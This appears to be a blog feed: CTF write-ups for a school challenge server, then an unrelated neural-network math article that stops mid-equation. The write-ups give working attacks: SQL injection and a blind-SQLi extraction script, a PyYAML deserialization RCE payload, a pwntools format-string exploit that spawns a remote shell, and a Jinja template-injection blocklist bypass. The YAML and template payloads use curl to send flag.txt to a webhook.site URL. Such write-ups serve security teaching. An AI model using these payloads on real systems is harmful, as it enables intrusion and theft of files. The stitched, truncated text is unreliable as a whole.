AppVenture Login page must be the most secure right? URL: http://35.240.143.82:4208/

Hint:

What's the first thing you do when pentesting a website?

One of the common files found on websites is `robots.txt`, which tells crawlers like google-bot which paths they should and should not visit.

In this case, `robots.txt` contains a path to the source code of the website, and the flag is inside the source code.

```
User-agent: *
Disallow: /c7179ef35b2d458d6f2f68044816e145/main.py
```
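As a side note, the same rule can be checked programmatically with Python's standard-library `urllib.robotparser` (a minimal sketch; in practice you would just open `/robots.txt` in a browser):

```python
from urllib.robotparser import RobotFileParser

# Parse the challenge's robots.txt rules locally (stdlib only)
rp = RobotFileParser()
rp.parse([
    "User-agent: *",
    "Disallow: /c7179ef35b2d458d6f2f68044816e145/main.py",
])

# A well-behaved crawler would skip the disallowed path...
print(rp.can_fetch("*", "/c7179ef35b2d458d6f2f68044816e145/main.py"))  # False
# ...but nothing stops a human from visiting it directly.
```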

```
...
flag0 = "flag{you_can_use_automated_tools_like_nikto_to_do_this}"
...
```

Flag obtained

Well, I haven't taken CS6131 yet, but databases should be easy right??

The description mentions databases; based on prior knowledge of the module CS6131, we can be fairly sure this is related to SQL.

Since the source builds its SQL query from a simple template string, we can apply a classic SQL injection to skip the password check.

```
@app.route("/login", methods=["post"])
def login():
    username = request.form.get('username', default='', type=str)
    password = request.form.get('password', default='', type=str)
    users = db.execute(f"select id from users where name='{username}' and password='{password}'").fetchall()
    if users:
        return Response(flag1, mimetype='text/plain')
    return Response('Login failed', mimetype='text/plain')
```

In SQL, comments start with `--`.

To skip the password check, we can simply input `admin' --` as the username and leave the password blank, which results in the following command:

```
select id from users where name='admin' --' and password=''
```

Everything after `--` is ignored, and we successfully log in as admin.
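To see exactly what the server ends up executing, we can reproduce its f-string locally; `build_query` is a hypothetical helper mirroring the source:

```python
def build_query(username, password):
    # the same template string the challenge source interpolates into
    return f"select id from users where name='{username}' and password='{password}'"

# a normal login attempt keeps the quotes balanced
print(build_query("admin", "hunter2"))

# the injected quote closes the string early and -- comments out the rest
print(build_query("admin' --", ""))
```

The standard fix is parameterized queries, e.g. `db.execute("select id from users where name=? and password=?", (username, password))` in `sqlite3`, which never splices user input into the SQL text.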

```
flag{you_can_pass_cs6131_now}
```

Flag obtained

]]>Ok, you got the flag, but I bet you'll never get my password!

Going by the description, the flag is probably the password. Even though we logged in as admin in the last challenge, we still do not know the password.

To get the password, we can check it one character at a time to reduce the number of tries; guessing the entire password string at once would require an exponential number of tries, which is unrealistic.

The flag format is `flag{...}`, where the characters consist of lowercase letters, `{}` and `_`. We can quickly code up a little script to find the password. In this writeup we will be using `node.js` for its simplicity and non-pythonic syntax.

```
const fetch = require("node-fetch");
const FormData = require('form-data');

let chars = "abcdefghijklmnopqrstuvwxyz_{}".split('');
let password = [];

async function verify(i, c) {
    const form = new FormData();
    form.append('username', `admin' and SUBSTRING(password, ${i + 1}, 1)='${c}' --`);
    const res = await fetch('http://35.240.143.82:4208/login', {method: 'POST', body: form});
    const text = await res.text();
    return text !== "Login failed";
}

async function step(i) {
    for (let c of chars) {
        if (await verify(i, c)) return c;
    }
    return null;
}

async function brute_force() {
    let i = 0;
    while (true) {
        password[i] = await step(i);
        console.log(password.join(''));
        if (!password[i]) break;
        i++;
    }
    console.log(password.join(''));
}

brute_force();
```

As before, we use `admin'` to escape the username field and `--` to skip the password check. However, we add our own check in the middle: `SUBSTRING(password, i, 1)` works the same as a normal substring would, except that SQL is 1-indexed (kinda weird, but yeah).

What happens looks like this:

- `select id from users where name='admin' and SUBSTRING(password, 1, 1)='a' --` → fail
- `select id from users where name='admin' and SUBSTRING(password, 1, 1)='b' --` → fail
- ...
- `select id from users where name='admin' and SUBSTRING(password, 1, 1)='f' --` → success
- `select id from users where name='admin' and SUBSTRING(password, 2, 1)='a' --` → fail
- ...

`verify` makes a request to check whether the password has the character `c` at position `i`.

`step` simply tries all characters for a position until one hits.

`brute_force()` steps through the positions until a correct character can't be found for a position, which is most likely the end of the password.

```
f
fl
fla
...
flag{oops_looks_like_youre_not_blind
flag{oops_looks_like_youre_not_blind}
flag{oops_looks_like_youre_not_blind}
flag{oops_looks_like_youre_not_blind}
```
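The whole extraction loop can also be sketched in Python against a local SQLite stand-in for the server (the table, the `flag{demo}` password and the `SUBSTR` call are illustrative, not the real challenge data):

```python
import sqlite3

# A local model of the vulnerable login, to show how one character leaks per query
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (id INTEGER, name TEXT, password TEXT)")
db.execute("INSERT INTO users VALUES (1, 'admin', 'flag{demo}')")

def login(username, password=""):
    # deliberately vulnerable f-string query, as in the challenge source
    q = f"select id from users where name='{username}' and password='{password}'"
    return bool(db.execute(q).fetchall())

alphabet = "abcdefghijklmnopqrstuvwxyz_{}"
recovered = ""
while True:
    for ch in alphabet:
        if login(f"admin' and SUBSTR(password, {len(recovered) + 1}, 1)='{ch}' --"):
            recovered += ch
            break
    else:
        break  # no character matched: end of password reached

print(recovered)  # flag{demo}
```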

Flag obtained

You've used espace2, but what about espace0?

Flag in `flag.txt`

As before, the source `main.py` was given:

```
from flask import Flask, request, render_template, Response
import yaml

app = Flask(__name__)
assert yaml.__version__ == "5.3.1"

@app.route("/")
def index():
    return render_template("./index.html")

@app.route("/", methods=["POST"])
def welcome():
    student_data = request.form.get("student_data")
    if not student_data:
        return Response("Please specify some data in YAML format", mimetype='text/plain')
    student_data = yaml.load(student_data)
    required_fields = ["id", "name", "class"]
    if type(student_data) != dict or "student" not in student_data or any(x not in student_data["student"] for x in required_fields):
        return Response("Malformed data. Please try again.", mimetype='text/plain')
    student = student_data["student"]
    return f"<h1>Welcome, {student['name']} ({student['id']})</h1> <br>Your class is <b>{student['class']}</b>"
```

There are no obvious vulnerabilities in this file, but the `assert yaml.__version__ == "5.3.1"` part is quite suspicious.

A quick google search with the keywords `pyyaml 5.3.1 vulnerabilities` leads us to `https://security.snyk.io/vuln/SNYK-PYTHON-PYYAML-590151`, a 9.8-scored RCE.

Conveniently, a `uiuctf` writeup that explains how the exploit works was included: https://hackmd.io/@harrier/uiuctf20

Apparently it was a zero-day vulnerability used in a CTF, what a chad move. We can simply take their payload and use it here, as google is allowed in CTFs.

`!!python/object/new:tuple [!!python/object/new:map [!!python/name:eval , [ 'PAYLOAD_HERE' ]]]`

`!!python/object/new:tuple [!!python/object/new:map [!!python/name:eval , [ '__import__("os").system("curl -X POST --data-binary @flag.txt https://webhook.site/40a3fae4-f378-4100-837c-8f94953fbbc9")' ]]]`

And after checking webhook.site for the received curl request

```
flag{yet_another_mal-coded_library}
```

Flag obtained

My wonderful app works both as an echo server and a file lister!

Bet you can't hack it! `nc 35.240.143.82 4203`

Only the compiled `chal` file was given; after decompiling it with Ghidra, I get:

```
undefined8 main(void)
{
    int32_t iVar1;
    char *format;

    setup();
    while( true ) {
        fgets(&format, 0x70, _stdin);
        iVar1 = strncmp(&format, "quit", 4);
        if (iVar1 == 0) break;
        printf(&format);
    }
    system("/bin/ls");
    return 0;
}
```

As we can see, `printf` is used to print the input directly, without a format string. This challenge is in the format string attack category, which I can verify with a simple `%x`:

```
$ nc 35.240.143.82 4203
%x
402004
%s
quit
```

I can use pwntools to quickly create the format string payload. I first have to find the offset, which can easily be done with:

```
from pwn import *

conn = remote("35.240.143.82", 4203)
context.clear(arch='amd64')

def send_payload(p):
    conn.wait(1)
    conn.sendline(p)
    return conn.recv()

print("offset =", FmtStr(execute_fmt=send_payload).offset)
```

```
[x] Opening connection to 35.240.143.82 on port 4203
[x] Opening connection to 35.240.143.82 on port 4203: Trying 35.240.143.82
[+] Opening connection to 35.240.143.82 on port 4203: Done
[*] Found format string offset: 6
offset = 6
[*] Closed connection to 35.240.143.82 port 4203
```

In the decompiler, I noticed that `/bin/ls` is located at `0x00404058`.

If I overwrite `/bin/ls` with `/bin/sh`, which has the same number of characters, I can gain remote shell access.

Hence I will be using `fmtstr_payload` from pwntools:

```
from pwn import *

conn = remote("35.240.143.82", 4203)
context.clear(arch='amd64')

payload = fmtstr_payload(0x6, {0x404058: b'/bin/sh'}, write_size='short')
conn.wait(1)
print("sending " + str(payload))
conn.sendline(payload)
print(conn.recv())
conn.sendline(b"quit")
conn.interactive()
```

We will be writing the string `/bin/sh` to address `0x404058` with offset `6`.

After sending the payload, `/bin/ls` will have been changed to `/bin/sh`. This means that after I exit the loop with `quit`, the final `system` call should give us shell access. I will then switch to interactive mode to take advantage of the shell more easily.

```
system("/bin/sh");
```

Indeed we gain remote shell access.

By running the command `ls`, I find `flag.txt`, and with `cat flag.txt`:

```
cat flag.txt
flag{why_would_printf_be_able_to_write_memory????!!}
```

Flag obtained

If you run the following you can find the message I left

`cd ~ cd w cat README.txt Hello, I was here ;) ZY`

I've added a bunch of filters, so my app must be really secure now.

Flag in `flag.txt`

URL: http://35.240.143.82:4209/

The source, `main.py`, is included, hence we should take a look:

```
import secrets
from flask import Flask, render_template_string, request

app = Flask(__name__)

@app.route("/")
def index():
    name = request.args.get("name", default="World")
    # Evil hacker cannot get past now!
    blocklist = ["{{", "}}", "__", "subprocess", "flag", "popen", "system", "os", "import", "read", "flag.txt"]
    for bad in blocklist:
        name = name.replace(bad, "")
    return render_template_string(f"<h1> Hello, {name}")
```

Since the server uses `render_template_string`, it's vulnerable to `{{ }}` template injection. If we pass `{{ 'Hello'+' '+'World' }}` as the name, it gives us `Hello World`, as the string inside is run as code.

However, as we can see, there is a blocklist, and it includes `{{` and `}}`.

To bypass this filter we can simply nest blocklisted words inside other blocklisted words. For example, `{flag{}flag}` will not trigger the checks for `{{` and `}}`, but will have `flag` removed by the `flag` check, resulting in `{{}}` as the end output.
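We can confirm the trick by running the server's own filter loop locally (`7 * 7` is just a placeholder expression):

```python
# the exact blocklist from main.py
blocklist = ["{{", "}}", "__", "subprocess", "flag", "popen", "system", "os", "import", "read", "flag.txt"]

# "flag" is nested so that removing it re-creates the braces
name = "{flag{ 7 * 7 }flag}"
for bad in blocklist:
    name = name.replace(bad, "")
print(name)  # {{ 7 * 7 }}
```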

Making use of this, we can construct our payload with the help of a little script. I had trouble reading the file directly, so I decided to just send the file contents out via curl; webhook.site is an easy-to-use site for receiving such data.

```
payload = '''{{(().__class__.__bases__[0].__subclasses__()[118].__init__.__globals__["__builtins__"])["__im"+"port__"]("o"+"s").system("curl -X POST --data-binary @flflag.txtag.txt https://webhook.site/40a3fae4-f378-4100-837c-8f94953fbbc9")}}'''

# nest "read" inside every blocklisted word (reversed so "read" itself is handled first)
bypass = ["{{", "}}", "__", "subprocess", "flag", "popen", "system", "os", "import", "read"]
bypass.reverse()
for toby in bypass:
    payload = payload.replace(toby, toby[0] + "read" + toby[1:])
print(payload)

# sanity check: run the server's own blocklist over our payload
name = payload
blocklist = ["{{", "}}", "__", "subprocess", "flag", "popen", "system", "os", "import", "read", "flag.txt"]
for bad in blocklist:
    name = name.replace(bad, "")
print(f"<h1> Hello, {name}")
```

If one simply uses `__import__`, one will soon realise that it does not exist; this could have been done by deleting built-ins from the python runtime.

We could restore the built-ins via `reload(__builtins__)`, however that is, obviously, also deleted.

We need to find `__import__` some other way.

With some experimenting, we find that

```
>>> ().__class__.__bases__
(<type 'object'>,)
```

The tuple inherits directly from `object`, hence we can find the list of classes that extend `object` by sending the payload

`{{().__class__.__bases__[0].__subclasses__()}}`

```
Hello, [<class 'type'>, <class 'async_generator'>, <class 'int'>, <class 'bytearray_iterator'>, <class 'bytearray'>, <class 'bytes_iterator'>, <class 'bytes'>... <class 'flask.blueprints.BlueprintSetupState'>]
```

Much of the output is useless, but `_frozen_importlib_external.FileLoader` (at position 118) looks a bit suspicious.

`{{().__class__.__bases__[0].__subclasses__()[118]}}`

```
Hello, <class '_frozen_importlib_external.FileLoader'>
```

This verifies that the class is indeed `FileLoader`; now let's see what builtins this `FileLoader` has.

`{{().__class__.__bases__[0].__subclasses__()[118].__init__.__globals__["__builtins__"]}}`

```
Hello, {'__name__': 'builtins' ... '__import__': <built-in function __import__>, ...help, or help(object) for help about object.}
```

**Hooray!** We found `__import__`; now we just have to combine everything into the payload

```
{{(().__class__.__bases__[0].__subclasses__()[118].__init__.__globals__["__builtins__"])["__im"+"port__"]("o"+"s").system("curl -X POST --data-binary @flflag.txtag.txt https://webhook.site/40a3fae4-f378-4100-837c-8f94953fbbc9")}}
```

`flag.txt` is manually bypassed, since it contains `flag`:

```
{read{(()._read_class_read_._read_bases_read_[0]._read_subclasses_read_()[118]._read_init_read_._read_globals_read_["_read_builtins_read_"])["_read_im"+"port_read_"]("o"+"s").sreadystem("curl -X POST --data-binary @flfreadlag.txtag.txt https://webhook.site/40a3fae4-f378-4100-837c-8f94953fbbc9")}read}
<h1> Hello, {{(().__class__.__bases__[0].__subclasses__()[118].__init__.__globals__["__builtins__"])["__im"+"port__"]("o"+"s").system("curl -X POST --data-binary @flag.txt https://webhook.site/40a3fae4-f378-4100-837c-8f94953fbbc9")}}
```

The first line is our payload, and after running the same blocklist operations as the server, the resulting string looks ok.

`http://35.240.143.82:4209/?name={read{(()._read_class_read_._read_bases_read_[0]._read_subclasses_read_()[118]._read_init_read_._read_globals_read_["_read_builtins_read_"])["_read_im"+"port_read_"]("o"+"s").sreadystem("curl -X POST --data-binary @flfreadlag.txtag.txt https://webhook.site/40a3fae4-f378-4100-837c-8f94953fbbc9")}read}`

And after checking webhook.site

```
flag{server_side_rendering_is_fun_but_dangerous_sometimes}
```

Flag obtained

**Mathematics** is an area of knowledge, which includes the study of such topics as numbers, formulas and related structures, shapes and the spaces in which they are contained, and quantities and their changes. There is no general consensus about its exact scope or epistemological status. However, it is extremely laborious and time-consuming, but necessary, and is sometimes (albeit very rarely) interesting.

Neural Networks are somewhat interesting. Everyone kind of knows the math behind NNs (the gist of it). It was taught in **CS5131** to a very limited extent, but not many know the full math behind deep and convolutional neural networks. I mean, people get that it has something to do with backpropagation or whatever, but how do you scale it up to multiple values and multiple derivatives? As you will come to learn, these derivations are incredibly computationally intensive and time-consuming, especially during implementation. But I have done it because I care about AppVenture and I want to help the casual onlooker understand the many trials and tribulations a simple layer goes through to deliver what we should consider peak perfection. It was a fun but painful exercise, and I gained a deeper understanding of the mathematical constructs that embody our world. Anyways, let's start out with a refresher. Be warned that Matrix Math lurks ahead, so tread with caution. This is deeper than **CS5131** could have ever hoped to cover, so you will learn some stuff with this exercise. This first part is about the math behind deep neural networks.

This article is written with some assumed knowledge of the reader but it is not that bad for most CS students especially since NNs are baby level for the most part. Nonetheless, assumed knowledge is written below.

- Deep Neural Network (How to implement + basic understanding of the math)
- Gradient Descent
- Linear Algebra

If you don't know this stuff, all you really need to do is read an introduction to linear algebra, understand how matrices and vectors are multiplied and watch 3b1b's series on machine learning.

Let's start by importing our bff for life, **Numpy**.

```
>>> import numpy as np
```

Numpy is introduced in CS4132 (or PC6432 for some reason), but for a quick summary, it is a Linear Algebra library, which means it is VERY useful in this task.

Observe the following series of mathematical equations:

$$ \begin{aligned} 4a+2b&=22\\ 3a+8b&=49 \end{aligned} $$

Despite the fact that solving these is pretty easy (as we learnt in Year 1), let's try going with a different solution from what is usually portrayed. Let's try using **gradient descent**.

If you remember, gradient descent is a method for solving equations by stepping towards the true value, using calculus to predict the direction and size of each step. Essentially, as you may remember from calculus, the minimum of a graph has a tangent of slope 0, and the slope elsewhere tells us which direction to step in. We just need a function whose value and derivative both approach 0 as you get closer to the true solution. This function is known as the objective function.
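As a toy illustration (a made-up one-dimensional objective, not the linear system we will solve later), gradient descent on $F(x)=(x-3)^2$ walks $x$ to the minimiser:

```python
# F(x) = (x - 3)^2 has derivative F'(x) = 2(x - 3); step against the slope
x = 0.0
learning_rate = 0.1
for _ in range(200):
    grad = 2 * (x - 3)
    x -= learning_rate * grad
print(round(x, 6))  # 3.0
```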

As you probably know, a linear equation is written as such:

$$ A \mathbf{x}-\mathbf{b}=0 $$

where $A$ is a known square matrix, $\mathbf{b}$ is a known vector and $\mathbf{x}$ is an unknown vector.

In this case, for the objective function we will use the Linear Least Squares (LLS) function, written below, as it is an apt thing to minimize here.

$$F(\mathbf{x}) = {||A\mathbf{x}-\mathbf{b}||}_{2}^{2}$$

Now, what do the weird lines and the two occurrences of "2" above mean, and how exactly do we calculate the derivative of a scalar with respect to a vector? Well, we have to learn matrix calculus, a very peculiar and rather torturous domain of math. Ideally, you want to avoid this at all costs, but I will do a gentle walk through this stuff.

Firstly, let's revise derivatives wth this simple example:

$$ \begin{aligned} y&=\sin(x^2)+5\\ \frac{dy}{dx}&=\frac{d}{dx}\left(\sin(x^2)+5\right)\\ &=2x\cos(x^2) \end{aligned} $$

For functions with multiple variables, we can find the partial derivative with respect to each of the variables, as shown below: $$ \begin{aligned} f(x,y)&=3xy+x^2\\ \frac{\partial f(x,y)}{\partial x}&=3y+2x\\ \frac{\partial f(x,y)}{\partial y}&=3x \end{aligned} $$

A thing to understand is that vectors are just a collection of numbers, so an n-sized vector will have n partial derivatives if the function is $f:\mathbb{R}^{n} \rightarrow \mathbb{R}$ (the derivative is known as the gradient). But do we represent these n partial derivatives as a column vector or row vector?

$$\frac{\partial y}{\partial\mathbf{x}} =
\begin{bmatrix}
\frac{\partial y}{\partial{\mathbf{x}}_{1}}\\
\frac{\partial y}{\partial{\mathbf{x}}_{2}}\\
\vdots\\
\frac{\partial y}{\partial{\mathbf{x}}_{n}}
\end{bmatrix}
$$

$$
\frac{\partial y}{\partial\mathbf{x}} =
\begin{bmatrix}
\frac{\partial y}{\partial{\mathbf{x}}_{1}} & \frac{\partial y}{\partial{\mathbf{x}}_{2}} & \cdots & \frac{\partial y}{\partial{\mathbf{x}}_{n}}
\end{bmatrix}
$$

Well, both actually work (even if you think of a vector as a column vector). The first version is called the denominator layout and the second the numerator layout; they are transposes of each other. For gradient descent the denominator layout feels more natural, because by standard practice we think of a vector as a column vector, and I also prefer it. However, the numerator layout follows the rules of single-variable calculus more closely and is much easier to follow. For example, matrices do not commute under multiplication, so the direction in which you chain terms matters: we naturally think of chaining new terms onto the back, which is what the numerator layout does, whereas in the denominator layout terms are chained onto the front. The product rule is also messier in the denominator layout. So moving forward we will stick with the numerator layout and transpose the matrix or vector once the derivative is found. We will also stick to column vectors.
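To illustrate the chaining direction (my own summary, for a chain $c = f(\mathbf{z}(\mathbf{x}))$): in the numerator layout new factors attach on the right, while the denominator layout is the transposed product with factors attaching on the left.

$$
\underbrace{\frac{\partial c}{\partial \mathbf{x}} = \frac{\partial c}{\partial \mathbf{z}}\frac{\partial \mathbf{z}}{\partial \mathbf{x}}}_{\text{numerator layout}}
\qquad
\underbrace{\frac{\partial c}{\partial \mathbf{x}} = \left(\frac{\partial \mathbf{z}}{\partial \mathbf{x}}\right)^{T}\left(\frac{\partial c}{\partial \mathbf{z}}\right)^{T}}_{\text{denominator layout}}
$$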

First, let's look at the $A\mathbf{x}-\mathbf{b}$ term, and we will see why the derivative is what it is with a simple $2 \times 2$ case. $A\mathbf{x}-\mathbf{b}$ is an $f:\mathbb{R}^{n} \rightarrow \mathbb{R}^{n}$ function, hence the derivative will be a matrix (known to many as the Jacobian). Let's first see the general equation and work it out for every value.

$$
\begin{aligned}
\mathbf{y} &= A\mathbf{x}-\mathbf{b}\\
\begin{bmatrix}
{\mathbf{y}}_{1} \\
{\mathbf{y}}_{2}
\end{bmatrix} &=
\begin{bmatrix}
{a}_{11} & {a}_{12}\\
{a}_{21} & {a}_{22}
\end{bmatrix}
\begin{bmatrix}
{\mathbf{x}}_{1} \\
{\mathbf{x}}_{2}
\end{bmatrix}
-
\begin{bmatrix}
{\mathbf{b}}_{1} \\
{\mathbf{b}}_{2}
\end{bmatrix} \\
&=
\begin{bmatrix}
{a}_{11}{\mathbf{x}}_{1} + {a}_{12}{\mathbf{x}}_{2}-{\mathbf{b}}_{1} \\
{a}_{21}{\mathbf{x}}_{1} + {a}_{22}{\mathbf{x}}_{2}-{\mathbf{b}}_{2}
\end{bmatrix}
\end{aligned}
$$

Now we calculate the Jacobian (remember that it is transposed) by calculating the individual derivative for every value.

$$
\begin{aligned}
\frac{\partial \mathbf{y}}{\partial \mathbf{x}} &=
\begin{bmatrix}
\frac{\partial {\mathbf{y}}_{1}}{\partial{\mathbf{x}}_{1}} & \frac{\partial {\mathbf{y}}_{1}}{\partial{\mathbf{x}}_{2}}\\
\frac{\partial {\mathbf{y}}_{2}}{\partial{\mathbf{x}}_{1}} & \frac{\partial {\mathbf{y}}_{2}}{\partial{\mathbf{x}}_{2}}
\end{bmatrix} \\
\frac{\partial {\mathbf{y}}_{1}}{\partial{\mathbf{x}}_{1}} &= {a}_{11}\\
\frac{\partial {\mathbf{y}}_{1}}{\partial{\mathbf{x}}_{2}} &= {a}_{12}\\
\frac{\partial {\mathbf{y}}_{2}}{\partial{\mathbf{x}}_{1}} &= {a}_{21}\\
\frac{\partial {\mathbf{y}}_{2}}{\partial{\mathbf{x}}_{2}} &= {a}_{22}\\
\frac{\partial \mathbf{y}}{\partial \mathbf{x}} &=
\begin{bmatrix}
{a}_{11} & {a}_{12}\\
{a}_{21} & {a}_{22}
\end{bmatrix}
= A
\end{aligned}
$$

We see that this is analogous to the single-variable case: if $f(x)=ax$ with $a$ constant, then $f'(x)=a$.

Now we look at the lines and "2"s. This is a common function known as the euclidean norm or 2-norm.

$$\|\mathbf{x}\|_{2}:={\sqrt{x_{1}^{2}+\cdots+x_{n}^{2}}}$$

We then square it, giving rise to the second "2". Now we define $\mathbf{y}=A\mathbf{x}-\mathbf{b}$ and do the same thing we did before. $\|\mathbf{y}\|_{2}^{2}$ is $f:\mathbb{R}^{n} \rightarrow \mathbb{R}$. Hence, the derivative is a row vector.

$$
\begin{aligned}
z&=\|\mathbf{y}\|_{2}^{2}\\
&={\mathbf{y}}_{1}^{2} + {\mathbf{y}}_{2}^{2}
\end{aligned}
$$

Now we calculate the Gradient (remember that it is transposed) by calculating the individual derivative for every value.

$$
\begin{aligned}
\frac{\partial z}{\partial\mathbf{y}} &=
\begin{bmatrix}
\frac{\partial z}{\partial{\mathbf{y}}_{1}} & \frac{\partial z}{\partial{\mathbf{y}}_{2}}
\end{bmatrix} \\
\frac{\partial z}{\partial{\mathbf{y}}_{1}} &= 2\mathbf{y}_{1} \\
\frac{\partial z}{\partial{\mathbf{y}}_{2}} &= 2\mathbf{y}_{2} \\
\frac{\partial z}{\partial\mathbf{y}} &=
\begin{bmatrix}
2\mathbf{y}_{1} & 2\mathbf{y}_{2}
\end{bmatrix}
= 2\mathbf{y}^{T}
\end{aligned}
$$

To illustrate the chain rule, I will calculate it individually and put it all together.

$$
\begin{aligned}
F(\mathbf{x}) &= {\|A\mathbf{x}-\mathbf{b}\|}_{2}^{2} \\
&= {({a}_{11}{\mathbf{x}}_{1} + {a}_{12}{\mathbf{x}}_{2}-{\mathbf{b}}_{1})}^{2} +
{({a}_{21}{\mathbf{x}}_{1} + {a}_{22}{\mathbf{x}}_{2}-{\mathbf{b}}_{2})}^{2}
\end{aligned}
$$

Now we calculate the Final Gradient by calculating the individual derivative for every value.

$$
\begin{aligned}
\frac{\partial F(\mathbf{x})}{\partial\mathbf{x}} &=
\begin{bmatrix}
\frac{\partial F(\mathbf{x})}{\partial{\mathbf{x}}_{1}} & \frac{\partial F(\mathbf{x})}{\partial{\mathbf{x}}_{2}}
\end{bmatrix}\\
\frac{\partial F(\mathbf{x})}{\partial{\mathbf{x}}_{1}} &= 2{a}_{11}({a}_{11}{\mathbf{x}}_{1} + {a}_{12}{\mathbf{x}}_{2}-{\mathbf{b}}_{1}) + 2{a}_{21}({a}_{21}{\mathbf{x}}_{1} + {a}_{22}{\mathbf{x}}_{2}-{\mathbf{b}}_{2})\\
\frac{\partial F(\mathbf{x})}{\partial{\mathbf{x}}_{2}} &= 2{a}_{12}({a}_{11}{\mathbf{x}}_{1} + {a}_{12}{\mathbf{x}}_{2}-{\mathbf{b}}_{1}) + 2{a}_{22}({a}_{21}{\mathbf{x}}_{1} + {a}_{22}{\mathbf{x}}_{2}-{\mathbf{b}}_{2})\\
\frac{\partial F(\mathbf{x})}{\partial\mathbf{x}} &=
\begin{bmatrix}
2{a}_{11}({a}_{11}{\mathbf{x}}_{1} + {a}_{12}{\mathbf{x}}_{2}-{\mathbf{b}}_{1}) + 2{a}_{21}({a}_{21}{\mathbf{x}}_{1} + {a}_{22}{\mathbf{x}}_{2}-{\mathbf{b}}_{2}) & 2{a}_{12}({a}_{11}{\mathbf{x}}_{1} + {a}_{12}{\mathbf{x}}_{2}-{\mathbf{b}}_{1}) + 2{a}_{22}({a}_{21}{\mathbf{x}}_{1} + {a}_{22}{\mathbf{x}}_{2}-{\mathbf{b}}_{2})
\end{bmatrix}\\
&= 2
\begin{bmatrix}
{a}_{11}{\mathbf{x}}_{1} + {a}_{12}{\mathbf{x}}_{2}-{\mathbf{b}}_{1} &
{a}_{21}{\mathbf{x}}_{1} + {a}_{22}{\mathbf{x}}_{2}-{\mathbf{b}}_{2}
\end{bmatrix}
\begin{bmatrix}
{a}_{11} & {a}_{12} \\
{a}_{21} & {a}_{22}
\end{bmatrix} = 2{(A\mathbf{x}-\mathbf{b})}^{T}A
\end{aligned}
$$

As we can see from that last step, it's a pretty complex expression, but you can see how neat matrix notation is compared to writing it all out, and you can see how matrix calculus works. With the numerator layout, it's very similar to single-variable calculus but with a few extra steps.

I then transpose the derivative back into the denominator layout, written below. The update rule we will use for gradient descent is also written below.

$$
\begin{aligned}
F(\mathbf{x}) &= {\|A\mathbf{x}-\mathbf{b}\|}^{2} \\
\nabla F(\mathbf{x}) &= 2 A^{T}(A\mathbf{x} -\mathbf{b}) \\
\mathbf{x}_{n+1} &= \mathbf{x}_{n}-\gamma \nabla F(\mathbf{x}_{n})
\end{aligned}
$$

where $\gamma$ is the learning rate. We need a small learning rate to prevent the function from taking overly large steps, since objective functions tend to overblow the "true" error.

We can now implement this in code form for a very simple linear system written below:

$$ \begin{aligned} w+3x+2y-z&=9\\ 5w+2x+y-2z&=4\\ x+2y+4z&=24\\ w+x-y-3z&=-12 \end{aligned} $$

This can be written as such in matrix form:

$$ \begin{bmatrix} 1 & 3 & 2 & -1\\ 5 & 2 & 1 & -2\\ 0 & 1 & 2 & 4\\ 1 & 1 & -1 & -3 \end{bmatrix} \begin{bmatrix} w\\ x\\ y\\ z \end{bmatrix} = \begin{bmatrix} 9\\ 4\\ 24\\ -12 \end{bmatrix} $$

$$ A= \begin{bmatrix} 1 & 3 & 2 & -1\\ 5 & 2 & 1 & -2\\ 0 & 1 & 2 & 4\\ 1 & 1 & -1 & -3 \end{bmatrix} $$

```
>>> A = np.array([[1,3,2,-1],[5,2,1,-2],[0,1,2,4],[1,1,-1,-3]], dtype=np.float64)
>>> A
array([[ 1.,  3.,  2., -1.],
       [ 5.,  2.,  1., -2.],
       [ 0.,  1.,  2.,  4.],
       [ 1.,  1., -1., -3.]])
```

$$ \mathbf{b}= \begin{bmatrix} 9\\ 4\\ 24\\ -12 \end{bmatrix} $$

```
>>> b = np.array([[9],[4],[24],[-12]], dtype=np.float64)
>>> b
array([[  9.],
       [  4.],
       [ 24.],
       [-12.]])
```

$$ \mathbf{x}= \begin{bmatrix} w\\ x\\ y\\ z \end{bmatrix} $$

```
>>> x = np.random.rand(4,1)
>>> x
array([[0.09257854],
       [0.16847643],
       [0.39120624],
       [0.78484474]])
```

$$ F(\mathbf{x}) = {||A\mathbf{x}-\mathbf{b}||}^{2} $$

```
>>> def objective_function(x):
...     return np.linalg.norm(np.matmul(A,x) - b) ** 2
```

$$ \nabla F(\mathbf {x} )=2A^{T}(A\mathbf {x} -\mathbf {b}) $$

```
>>> def objective_function_derivative(x):
...     return 2 * np.matmul(A.T, np.matmul(A,x) - b)
```

In this case, I implemented an arbitrary learning rate and an arbitrary step count. In traditional (non-machine-learning) gradient descent, the learning rate changes per step and is determined via a heuristic such as the Barzilai–Borwein method; however, this is not necessary here as gradient descent is very robust. I used an arbitrary step count for simplicity, but you should ideally use some sort of boolean condition to break the loop, such as $F(\mathbf{x})<0.01$.

$$
\mathbf{x}_{n+1}=\mathbf{x}_{n}-\gamma \nabla F(\mathbf{x}_{n})
$$

```
>>> learning_rate = 0.01
>>> for i in range(5000):
...     x -= learning_rate * objective_function_derivative(x)
...
>>> x
array([[1.],
       [2.],
       [3.],
       [4.]])
```

And to check, we now use a simple matrix multiplication:

```
>>> np.matmul(A,x)
array([[  9.],
       [  4.],
       [ 24.],
       [-12.]])
```

Voila, we have solved the equation with gradient descent; the computed solution matches the exact one almost perfectly. This shows the power of gradient descent.

To understand the math behind a deep neural network layer, we will first look at the single perceptron case.

$$ \begin{aligned} z&=xw+b\\ a&=\sigma(z) \end{aligned} $$

where $w$ is the weight, $b$ is the bias, $x$ is the input, $\sigma$ is the activation function and $a$ is the output.

We assume that this is a single layer network and that the loss function is just applied after, and we will just use the MSE loss.

$$c = {(a-y)}^2$$

where $y$ is the true y, $c$ is the cost.

In this case, it is quite easy to represent. Let us expand it to a layer with 4 input neurons and 4 output neurons.

$$
\begin{aligned}
{w}_{11}{x}_{1} + {w}_{21}{x}_{2} + {w}_{31}{x}_{3} + {w}_{41}{x}_{4} + {b}_{1} &= {z}_{1}\\
{w}_{12}{x}_{1} + {w}_{22}{x}_{2} + {w}_{32}{x}_{3} + {w}_{42}{x}_{4} + {b}_{2} &= {z}_{2}\\
{w}_{13}{x}_{1} + {w}_{23}{x}_{2} + {w}_{33}{x}_{3} + {w}_{43}{x}_{4} + {b}_{3} &= {z}_{3}\\
{w}_{14}{x}_{1} + {w}_{24}{x}_{2} + {w}_{34}{x}_{3} + {w}_{44}{x}_{4} + {b}_{4} &= {z}_{4}\\
{a}_{1}&=\sigma({z}_{1})\\
{a}_{2}&=\sigma({z}_{2})\\
{a}_{3}&=\sigma({z}_{3})\\
{a}_{4}&=\sigma({z}_{4})\\
